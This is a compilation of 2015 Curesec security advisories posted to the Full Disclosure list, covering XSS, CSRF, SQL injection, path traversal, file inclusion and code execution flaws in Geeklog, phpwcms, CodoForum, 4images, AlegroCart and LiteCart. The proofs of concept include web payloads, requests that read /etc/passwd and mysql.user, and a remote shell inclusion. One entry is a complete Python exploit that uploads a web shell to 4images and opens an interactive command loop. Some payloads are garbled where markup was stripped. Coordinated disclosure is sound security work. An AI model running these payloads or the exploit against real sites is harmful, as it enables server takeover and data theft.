tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Geeklog 2.1.0: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Geeklog 2.1.0 Fixed in:2.1.1b3 Fixed Version Link: https://www.geeklog.net/filemgmt/visit.php/1156 Vendor Contact: geeklog-secur...@lists.geeklog.net Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 12/02/2015 Release mode:Coordinated release CVE: requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description There is at least one XSS vulnerability in the installation script of Geeklog. Geeklog recommends to delete the install directory and displays warnings in the admin area if this is not the case. However, deleting the install directory is not mandatory, so it should be assumed that not all users will delete it. 3. Proof of Concept http://localhost/geeklog-2.1.0/public_html/admin/install/bigdump.php?foffset=1&start=1&fn=tealert(1)st.sql $_REQUEST['site_url'], $_REQUEST['site_admin_url'], and $_SERVER['PHP_SELF'] may be vulnerable as well, but the attacker would need a valid sql backup file to trigger them. 4. Solution To mitigate this issue please upgrade at least to version 2.1.1b3: https://www.geeklog.net/filemgmt/visit.php/1156 Please note that a newer version might already be available. 5. Report Timeline 09/29/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date 10/21/2015 Vendor asks for an additional two weeks for testing 11/17/2015 CVE Requested (no reply) 11/30/2015 Vendor releases fix 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Geeklog-210-XSS-121.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] phpwcms 1.7.9: Code Execution
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: phpwcms 1.7.9
Fixed in: 1.8.0 RC1
Fixed Version https://github.com/slackero/phpwcms/archive/
Link: phpwcms-1.8.0-RC1.zip
Vendor Website:http://www.phpwcms.de/
Vulnerability Code Execution
Type:
Remote Yes
Exploitable:
Reported to09/29/2015
vendor:
Disclosed to 12/02/2015
public:
Release mode: Coordinated release
CVE: requested, but not assigned
CreditsTim Coen of Curesec GmbH
2. Overview
phpwcms allows the upload of files with dangerous type, which leads to code
execution. Additionally, it allows registered users who are not admins to use
PHP tags, which also leads to code execution.
Please note that a user account is needed to upload files. The user does not
need administration rights, but there is no open registration by default (the
form to add users is however open to CSRF).
3. Unrestricted Upload of File with Dangerous Type
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
When uploading files, there are no checks as to the type or extension of the
file.
When uploading single files, these are stored inside the "filearchive"
directory. The original file name is changed to the hash of the file name. The
directory is protected with a .htaccess file from accessing or executing files
directly. Because of this, uploading single files can not easily be exploited;
it may however be possible to execute them via include_int_php (see below).
However, when uploading multiple files, these are stored temporarily inside the
"upload" directory, and these files are not renamed. The "upload" directory is
also protected by an .htaccess file, but as .htaccess files can be uploaded, it
can be overwritten, thus leading to code execution.
Please note that a user account is needed to upload files. The user does not
need administration rights, but there is no open registration by default.
Proof of Concept
Upload a .htaccess file and a PHP file here:
http://localhost/phpwcms-phpwcms-1.7.9/phpwcms.php?do=files&p=8
The .htaccess file should contain:
allow from all
Now the uploaded PHP file can be accessed and executed:
http://localhost/phpwcms-phpwcms-1.7.9/upload/shell.php?x=id
4. Code Execution
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
The functions include_int_php, include_int_phpcode, and include_ext_php can all
be used to gain code execution. These functions can be used by any logged in
user, admin rights are not required.
Proof of Concept
Create a new article. As author, use
[PHP] passthru("touch mynewtest.php") [/PHP]
Visiting
http://localhost/phpwcms-phpwcms-1.7.9/feeds.php
is one of the ways to trigger the code execution.
Please note that the feed is by default cached for one hour, during which the
code would not be executed as the cache is loaded instead.
The vulnerable functions are used in other places as well, which means an
attacker may not have to wait an hour for the cache to clear by triggering the
code elsewhere.
5. Solution
To mitigate this issue please upgrade at least to version 1.8.0 RC1:
https://github.com/slackero/phpwcms/archive/phpwcms-1.8.0-RC1.zip
Please note that a newer version might already be available.
6. Report Timeline
09/29/2015 Informed Vendor about Issue
09/29/2015 Vendor confirmed issues
10/21/2015 Reminded Vendor of Disclosure Date
10/25/2015 Vendor requests more time
11/17/2015 CVE Requested (no reply)
11/24/2015 Reminded Vendor of Disclosure Date
11/29/2015 Vendor releases fix
12/02/2015 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/phpwcms-179-Code-Execution-122.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] phpwcms 1.7.9: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product: phpwcms 1.7.9 Fixed in: 1.8.0 RC1 Fixed Version https://github.com/slackero/phpwcms/archive/ Link: phpwcms-1.8.0-RC1.zip Vendor Website:http://www.phpwcms.de/ Vulnerability CSRF Type: Remote Yes Exploitable: Reported to09/29/2015 vendor: Disclosed to 12/02/2015 public: Release mode: Coordinated release CVE: requested, but not assigned CreditsTim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description There is no CSRF protection for any forms, which means that an attacker can perform any action a victim can perform, if the victim visits an attacker controlled website while logged in. In the case of phpwcms, an attacker can add an admin user and thus gain code execution. 3. Proof of Concept Add Admin User: http://localhost/phpwcms-phpwcms-1.7.9/phpwcms.php?do=admin&s=1"; method="POST"> 4. Solution To mitigate this issue please upgrade at least to version 1.8.0 RC1: https://github.com/slackero/phpwcms/archive/phpwcms-1.8.0-RC1.zip Please note that a newer version might already be available. 5. Report Timeline 09/29/2015 Informed Vendor about Issue 09/29/2015 Vendor confirmed issues 10/21/2015 Reminded Vendor of Disclosure Date 10/25/2015 Vendor requests more time 11/17/2015 CVE Requested (no reply) 11/24/2015 Reminded Vendor of Disclosure Date 11/29/2015 Vendor releases fix 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/phpwcms-179-CSRF-123.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CodoForum 3.4: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:CodoForum 3.4 Fixed in:not fixed Fixed Version Link: n/a Vendor Contact: ad...@codologic.com Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/01/2015 Disclosed to public: 12/02/2015 Release mode:Full Disclosure CVE: Requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description There is an XSS vulnerability in CodoForum 3.4. With this, it is possible to steal cookies, bypass CSRF protection, or inject JavaScript keyloggers. The HybridAuth 2.1.2 Install script is vulnerable to XSS attacks. In version 3.4, CodoForum did update HybridAuth to the latest version, but kept the old version in a folder called hybridauthold. 3. Proof of Concept http://localhost/codoforum/sys/Ext/hybridauthold/install.php/";>alert(1) 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/01/2015 Informed Vendor about Issue (no reply) 09/22/2015 Reminded Vendor of disclosure date 09/23/2015 Vendor requests clarification 09/23/2015 Clarified Issue 09/29/2015 Reminded Vendor of disclosure date 09/29/2015 Vendor requests more time 09/29/2015 Set new disclosure date 11/03/2015 Reminded Vendor of disclosure date (no reply) 11/17/2015 CVE Requested (no reply) 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/CodoForum-34-XSS-62.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] 4images 1.7.11: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:4images 1.7.11 Fixed in:1.7.12 Fixed Version Link: http://www.4homepages.de/download-4images Vendor Website: http://www.4homepages.de/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 11/04/2015 Release mode:Coordinated release CVE: Requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description 4images comes with a HTML Template editor which allows the editing of HTML files. But it will also create a new file if the passed file name does not already exist. When doing this, it does not check that the extension of the passed file is .html. Admin credentials are required to use the HTML template editor. 3. Proof of Concept POST /4images/admin/templates.php HTTP/1.1 __csrf=28a9a05b480c3f8ed326523b1ce7532c&action=savetemplate&content=%s", $lang['template_edit_error']); } } $action = "modifytemplates"; } 5. Solution To mitigate this issue please upgrade at least to version 1.7.12: http://www.4homepages.de/download-4images Please note that a newer version might already be available. 6. Report Timeline 09/29/2015 Informed Vendor about Issue 10/21/2015 Reminded Vendor of Disclosure Date 11/03/2015 Vendor releases fix 11/17/2015 CVE Requested (no reply) 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/4images-1711-Code-Execution-105.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] 4images 1.7.11: Code Execution Exploit
#!/usr/local/bin/python
# Exploit for 4images 1.7.11 Code Execution vulnerability
# An admin account is required to use this exploit
# Curesec GmbH
import sys
import re
import argparse
import requests # requires requests lib
parser = argparse.ArgumentParser()
parser.add_argument("url", help="base url to vulnerable site")
parser.add_argument("username", help="admin username")
parser.add_argument("password", help="admin password")
args = parser.parse_args()
url = args.url
username = args.username
password = args.password
loginPath = "/admin/index.php"
fileManagerPath = "/admin/templates.php"
shellFileName = "404.php"
shellContent = ""
def login(requestSession, url, username, password):
csrfRequest = requestSession.get(url)
csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />',
csrfRequest.text)
csrfToken = csrfTokenRegEx.group(1)
postData = {"action": "login", "redirect": ".%2F..%2Fadmin%2Findex.php",
"__csrf": csrfToken, "loginusername": username, "loginpassword": password}
loginResult = requestSession.post(url, data = postData).text
return "loginpassword" not in loginResult
def upload(requestSession, url, fileName, fileContent):
csrfRequest = requestSession.get(url)
csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />',
csrfRequest.text)
csrfToken = csrfTokenRegEx.group(1)
postData = {"action": "savetemplate", "content": fileContent,
"template_file_name": fileName, "__csrf": csrfToken, "template_folder":
"default"}
loginResult = requestSession.post(url, data = postData).text
def runShell(url):
print("enter command, or enter exit to quit.")
command = raw_input("$ ")
while "exit" not in command:
print(requests.get(url + command).text)
command = raw_input("$ ")
requestSession = requests.session()
if login(requestSession, url + loginPath, username, password):
print("successful: login")
else:
exit("ERROR: Incorrect username or password")
upload(requestSession, url + fileManagerPath, shellFileName, shellContent)
runShell(url + "/templates/default/" + shellFileName + "?x=")
Blog Reference:
https://blog.curesec.com/article/blog/4images-1711-Code-Execution-Exploit-117.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] 4images 1.7.11: Path Traversal
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:4images 1.7.11
Fixed in:1.7.12
Fixed Version Link: http://www.4homepages.de/download-4images
Vendor Website: http://www.4homepages.de/
Vulnerability Type: Path Traversal
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode:Coordinated release
CVE: Requested, but not assigned
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
CVSS
Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N
Description
When downloading or displaying a backup file, the file Parameter is vulnerable
to directory traversal. This is the case because the get_basefile function
contains a bug. When the passed path name ends with a slash, it will return the
entire path instead of the file name.
By adding ?/ to the file name, an attacker can thus download or display
arbitrary files.
Admin credentials are required to view or download backup files.
3. Proof of Concept
GET
/4images/admin/backup.php?action=downloadbackup&file=../../../../../../etc/passwd?/
HTTP/1.1
GET
/4images/admin/backup.php?action=showbackup&file=../../../../../../etc/passwd?/
HTTP/1.1
4. Code
/admin/bachup.php
if (isset($HTTP_GET_VARS['file']) || isset($HTTP_POST_VARS['file'])) {
$file = (isset($HTTP_GET_VARS['file'])) ?
get_basefile(trim($HTTP_GET_VARS['file'])) :
get_basefile(trim($HTTP_POST_VARS['file']));
}
else {
$file = "";
}
if ($action == "downloadbackup") {
$size = @filesize(ROOT_PATH.DATABASE_DIR."/".$file);
header("Content-type: application/x-unknown");
header("Content-length: $size\n");
header("Content-Disposition: attachment; filename=$file\n");
readfile(ROOT_PATH.DATABASE_DIR."/".$file);
exit;
}
/includes/functions.php
function get_basename($path) {
$path = str_replace("\\", "/", $path);
$name = substr(strrchr($path, "/"), 1);
return $name ? $name : $path;
}
function get_basefile($path) {
$basename = get_basename($path);
preg_match("#(.+)\?(.+)#", $basename, $regs);
return isset($regs[1]) ? $regs[1] : $basename;
}
5. Solution
To mitigate this issue please upgrade at least to version 1.7.12:
http://www.4homepages.de/download-4images
Please note that a newer version might already be available.
6. Report Timeline
09/29/2015 Informed Vendor about Issue
10/21/2015 Reminded Vendor of Disclosure Date
11/03/2015 Vendor releases fix
11/17/2015 CVE Requested (no reply)
12/02/2015 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/4images-1711-Path-Traversal-106.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] 4images 1.7.11: SQL Injection
Security Advisory - Curesec Research Team 1. Introduction Affected Product:4images 1.7.11 Fixed in:1.7.12 Fixed Version Link: http://www.4homepages.de/download-4images Vendor Website: http://www.4homepages.de/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 12/02/2015 Release mode:Coordinated release CVE: Requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description When backing up the database, the user can supply the tables that should be backed up. The program does not check if these tables actually belong to the 4images database or to a different database. Because of this, it is possible to back up, and thus read, any database the database user has access to. However, even if there were a check for the database, it would still be possible to perform arbitrary SELECT statements by injecting into a SELECT query that looks like this: "SELECT * FROM $table" where $table is user supplied. Admin credentials are required to back up the database. 3. Proof of Concept POST /4images/admin/backup.php HTTP/1.1 __csrf=43c557c252fe6f57db4720b23771c7ab&action=makebackup&db_tables%5B%5D=mysql.user POST /4images/admin/backup.php HTTP/1.1 __csrf=43c557c252fe6f57db4720b23771c7ab&action=makebackup&db_tables%5B%5D=4images_comments where comment_id=-1 union all select user,password,3,4,5,6,7,8 from mysql.user 4. Solution To mitigate this issue please upgrade at least to version 1.7.12: http://www.4homepages.de/download-4images Please note that a newer version might already be available. 5. Report Timeline 09/29/2015 Informed Vendor about Issue 10/21/2015 Reminded Vendor of Disclosure Date 11/03/2015 Vendor releases fix 11/17/2015 CVE Requested (no reply) 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/4images-1711-SQL-Injection-108.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] 4images 1.7.12: XSS
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:4images 1.7.12
Fixed in:1.7.13 (update)
Fixed Version Link: http://www.4homepages.de/download-4images
Vendor Website: http://www.4homepages.de/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode:Coordinated release
CVE: Requested, but not assigned
Credits Tim Coen of Curesec GmbH
2. Overview
There are two reflected XSS vulnerabilities in 4images, as well as a persistent
Open Redirect, which may also lead to XSS in older browsers.
This allows an attacker to execute arbitrary JavaScript in the context of the
browser of a victim if the victim clicks on an attacker supplied link or visits
an attacker controlled website. With this, it is possible to bypass CSRF
protection and thus do anything the victim can do, inject a JavaScript
keylogger, or perform phishing attacks.
It should be noted that the XSS vulnerability still existed in another form in
the first release of version 1.17.13 and has been fixed with an update to that
version.
3. Reflected XSS 1
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description
When displaying the form to add new images, $_SERVER['PHP_SELF'] is echoed
unencoded inside a select tag. Because of this, additional attributes can be
added and new HTML tags can be created, leading to XSS.
Proof of Concept
Prior to Version 1.7.12:
http://localhost/4images/admin/images.php/"; onfocus=alert(1) autofocus
foo="?action=addimages
Version 1.7.13 (before update):
http://localhost/4images/admin/images.php/');alert(1);window.location=('?action=addimages
This required a click of the victim to trigger, and a redirect will be
performed after the execution of the injected code.
Code
/admin/images.php
show_num_select_row(" ", "num_newimages",
$lang['num_addnewimages_desc']);
/admin/admin_functions.php
function show_num_select_row($title, $option, $desc = "") {
global $site_sess, $PHP_SELF, $action, $$option;
echo "\n".$title."\n";
echo "".$desc;
$url = $PHP_SELF;
$url .= preg_match("/\?/", $url) ? "&" : "?";
$url .= "action=".$action;
$url = $site_sess->url($url);
echo "url($goto);
}
else {
$framesrc = $site_sess->url("home.php");
}
?>
Control Panel
" name="head" scrolling="NO" NORESIZE frameborder="0" marginwidth="0"
marginheight="0" border="no">
" name="nav" scrolling="auto" NORESIZE frameborder="0" marginwidth="0"
marginheight="0" border="no">
5. Persistent Open Redirect
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description
When showing an uploaded image, the description and keyword are not properly
encoded. Tags are removed, but it is still possible to add further attributes
to the meta tag they are inserted into.
This makes it possible to inject a redirect. This redirect will be persistent,
meaning anyone visiting the site of the uploaded image will be redirected to an
attacker controlled website.
The attacker needs the rights to upload images to perform the attack, which
means that a category needs to exist where anyone can upload images, or a
category needs to exist where registered users can upload images and the
registration must be open - which it is by default.
Proof of Concept
Upload an image, as description or keyword use:
Version 1.7.11 and earlier:
5;URL=http://google.com/"; http-equiv="refresh" foo="
Version 1.7.12:
5;URL=http://google.com/"; http-equiv=refresh foo="
When visiting the page of the uploaded image, a redirect will be performed.
With older browsers, it will be possible to inject and execute javascript as
well.
Code
details.php
$meta_keywords = !empty($image_row['image_keywords']) ?
strip_tags(implode(", ", explode(",", $image_row['image_keywords']))) : "";
$meta_description = !empty($image_row['image_description']) ?
strip_tags($image_row['image_description']) . ". " : "";
$site_template->register_vars(array(
"detail_meta_description" => $meta_description,
"detail_meta_keywords" => $meta_keywords,
"prepend_head_title"=> $image_name . " - ",
));
6. Solution
To mitigate this issue please upgrade at least to version 1.7.13:
http://www.4homepages.de/download-4images
Please note that a newer version might already be available.
7. Report Timeline
09/29/2015 Informed Vendor about Issue
10/21/2015 Reminded Vendor of Disclosure Date
11/03/2015 Vendor releases new version (1.7.12), partially fixing issues
11/17/2015 CVE Requested (no reply)
11/18/2015 Vendor releases new ve
Re: [FD] LiteCart 1.3.2: Multiple XSS
Hi, These vulnerabilities are similar, as both of them are issues with the query parameter of the search. However, the issue in version 1.1.2.1 exploits this line: This issue was fixed in version 1.2 by passing the query parameter to htmlspecialchars before passing it to sprintf. The issue in version 1.3.2 is that the query parameter is also echoed unencoded inside the title tag, which is why the POC contains . Best Curesec Research Team Am 11/18/2015 um 6:50 PM schrieb Henri Salo: > On Fri, Nov 13, 2015 at 05:07:01PM +0100, Curesec Research Team (CRT) wrote: >> 2. XSS 1 >> http://localhost/ecommerce/litecart-1.3.2/public_html/en/search?query=";>alert(1) >> 5. Solution >> To mitigate this issue please upgrade at least to version 1.3.3: > > This seems to be the same vulnerability as CVE-2014-7183[1] found by > Netsparker[2]. CVE-2014-7183 was fixed in version 1.2 according to the > changelog. > > 1: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7183 > 2: https://www.netsparker.com/xss-vulnerabilities-in-litecart/ > > ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] AlegroCart 1.2.8: SQL Injection
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:AlegroCart 1.2.8
Fixed in:Patch AC128_fix_17102015
Path Link: http://forum.alegrocart.com/download/file.php?id=1040
Vendor Website: http://alegrocart.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode:Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
There is a blind SQL injection in the admin area of AlegroCart. Additionally,
there is a blind SQL injection when a customer purchases a product. Because of
a required interaction with PayPal, this injection is hard to exploit for an
attacker.
3. BLind SQL Injection (Admin)
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
When viewing the list of uploaded files - or images - , the function
check_download is called. This function performs a database query with the
unsanitized name of the file. Because of this, an attacker can upload a file
containing SQL code in its name, which will be executed once files are listed.
Note that a similar function - check_filename - is called when deleting a file,
making it likely that this operation is vulnerable as well.
Admin credentials are required to exploit this issue.
Proof of Concept
POST
/ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download&action=insert
HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en;
alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669;
currency=CAD; catalog_language=en; __atuvc=4%7C37
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---16690383031191084421650661794
Content-Length: 865
-16690383031191084421650661794
Content-Disposition: form-data; name="language[1][name]"
test
-16690383031191084421650661794
Content-Disposition: form-data; name="download"; filename="image.jpg' AND
IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(1,ENCODE('MSG','by 5
seconds')),null) -- -"
Content-Type: image/jpeg
img
-16690383031191084421650661794
Content-Disposition: form-data; name="mask"
11953405959037.jpg
-16690383031191084421650661794
Content-Disposition: form-data; name="remaining"
1
-16690383031191084421650661794
Content-Disposition: form-data; name="dc8bd9802df2ba1fd321b32bf73c62c4"
f396df6c76265de943be163e9b65878a
-16690383031191084421650661794--
Visiting
http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download
will trigger the injected code.
Code
/upload/admin2/model/products/model_admin_download.php
function check_download($filename){
$result = $this->database->getRow("select * from download where
filename = '".$filename."'");
return $result;
}
function check_filename($filename){
$results = $this->database->getRows("select filename from download
where filename = '" . $filename . "'");
return $results;
}
/upload/admin2/controller/download.php
function checkFiles() {
$files=glob(DIR_DOWNLOAD.'*.*');
if (!$files) { return; }
foreach ($files as $file) {
$pattern='/\.('.implode('|',$this->prohibited_types).')$/';
$filename=basename($file);
if (!preg_match($pattern,$file) &&
$this->validate->strlen($filename,1,128)) {
$result =
$this->modelDownload->check_download($filename);
if (!$result) { $this->init($filename); }
}
}
}
4. BLind SQL Injection (Customer)
CVSS
Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
There is an SQL Injection when using Paypal as a payment method during
checkout.
Please note that this injection requires that a successful interaction with
Paypal took place. For test purposes, we commented out the parts of the code
that actually perform this interaction with Paypal.
Proof of Concept
1. Register a User
2. Buy an item, using PayPal as payment method; stop at step "Checkout
Confirmation"
3. Visit this link to trigger the injection:
http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=INJECTION.
Note that this requires a valid paypal tx token.
The injection can be exploited blind:
http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=-1'
AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(5000,ENCODE('MSG','by 5
seconds')),null) %23)
However, this is rather unpractical, especially considering the need for a
valid PayPal token for each request.
It is also possible
[FD] AlegroCart 1.2.8: LFI/RFI
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:AlegroCart 1.2.8
Fixed in:Patch AC128_fix_22102015
Path Link: http://forum.alegrocart.com/download/file.php?id=1047
Vendor Website: http://alegrocart.com/
Vulnerability Type: LFI/RFI
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode:Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
When retrieving logs, there are no checks on the given file_path Parameter.
Because of this, local or remote files can be included, which are then executed
or printed.
Admin credentials are required to view logs.
3. Proof of Concept
Remote File:
POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en;
alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669;
currency=CAD; catalog_language=en
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---16809437203643590021165278222
Content-Length: 441
-16809437203643590021165278222
Content-Disposition: form-data; name="directory"
error_log
-16809437203643590021165278222
Content-Disposition: form-data; name="file_path"
http://localhost/shell.php
-16809437203643590021165278222
Content-Disposition: form-data; name="decrytion"
0
-16809437203643590021165278222--
Local File:
POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en;
alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669;
currency=CAD; catalog_language=en
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---16809437203643590021165278222
Content-Length: 425
-16809437203643590021165278222
Content-Disposition: form-data; name="directory"
error_log
-16809437203643590021165278222
Content-Disposition: form-data; name="file_path"
/etc/passwd
-16809437203643590021165278222
Content-Disposition: form-data; name="decrytion"
0
-16809437203643590021165278222--
For the patches AC128_fix_13102015 and AC128_fix_17102015 the following attack
strings were still working:
http://localhost/shell.php?x=ls&foo=/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/
/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/../../../../../../../etc/passwd
4. Code
/ upload/admin2/controller/report_logs.php
function get_file(){
$file = '';
if($this->request->gethtml('file_path', 'post')){
$file = file_get_contents($this->request->gethtml('file_path',
'post'));
}
if($this->request->gethtml('decrytion', 'post')){
$file = $this->ccvalidation->deCrypt($file,
$this->config->get('config_token'));
}
if($file){
$file = str_replace(array("\r\n", "\r", "\n"),'', $file);
}
return $file;
}
5. Solution
To mitigate this issue please apply this patch:
TODO
Please note that a newer version might already be available.
6.. Report Timeline
09/29/2015 Informed Vendor about Issue
11/03/2015 Vendor releases fix
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/AlegroCart-128-LFIRFI-102.html
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] LiteCart 1.3.2: Multiple XSS
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:LiteCart 1.3.2
Fixed in:1.3.3
Fixed Version Link: https://www.litecart.net/downloading?version=1.3.3.1
Vendor Contact: developm...@litecart.net
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/07/2015
Disclosed to public: 11/13/2015
Release mode:Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. XSS 1
Description
The query parameter of the search is vulnerable to XSS.
Proof of Concept
http://localhost/ecommerce/litecart-1.3.2/public_html/en/search?query=";>alert(1)
Code
public_html/pages/search.inc.php
document::$snippets['title'][] = empty($_GET['query']) ?
language::translate('title_search_results', 'Search Results') :
sprintf(language::translate('title_search_results_for_s', 'Search Results for
"%s"'), $_GET['query']);
3. XSS 2
Description
The value of the GET parameter slide_id is passed to trigger_error if it is an
invalid id. trigger_error does not encode input, and as LiteCart shows errors
by default, this leads to an XSS vulnerability.
Proof of Concept
http://localhost/ecommerce/litecart-1.3.2/public_html/admin/?app=slides&doc=edit_slide&page=1&slide_id=alert(1)
Code
includes/controllers/ctrl_slide.inc.php
if (empty($this->data)) trigger_error('Could not find slide ('.
$slide_id .') in database.', E_USER_ERROR);
4. XSS 3
